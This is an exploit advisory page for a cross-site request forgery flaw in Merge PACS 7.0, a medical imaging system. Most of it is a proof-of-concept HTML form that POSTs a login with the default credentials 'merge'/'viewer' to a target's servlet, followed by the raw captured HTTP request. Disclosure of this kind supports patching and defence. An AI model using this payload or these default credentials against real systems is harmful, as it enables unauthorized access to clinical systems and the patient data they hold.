Merge PACS 7.0 Cross Site Request Forgery

2018.05.22
Credit: Safak Aslan
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

# Exploit Title: Merge PACS 7.0 - Cross-Site Request Forgery # Google Dork: - # Date: 2018-05-21 # Exploit Author: Safak Aslan # Vendor Homepage: http://www.merge.com/ # Version: Merge PACS 7.0 # Tested on: Windows # CVE: - # 1. Proof of Concept <html> <body> <script>history.pushState('', '', '/')</script> <form action="https://targetIP/servlet/actions/merge-viewer/summary" method="POST"> <input type="hidden" name="amicasUsername" value="merge" /> <input type="hidden" name="password" value="viewer" /> <input type="hidden" name="submitButton" value="Login" /> <input type="submit" value="Submit request" /> </form> </body> </html> Post Data: POST /servlet/actions/merge-viewer/summary HTTP/1.1 Host: targetIP User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en,tr-TR;q=0.8,tr;q=0.5,en-US;q=0.3 Accept-Encoding: gzip, deflate Referer: https://targetIP/servlet/actions/merge-viewer/login?redirectTo=https%3A%2F%2FtargetIP%2Fservlet%2Factions%2Fmerge-viewer%2Fsummary Content-Type: application/x-www-form-urlencoded Content-Length: 55 Cookie: JSESSIONID=6846606B53045FE6474A57C71719C93D Connection: close Upgrade-Insecure-Requests: 1 amicasUsername=merge&password=viewer&submitButton=Login


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top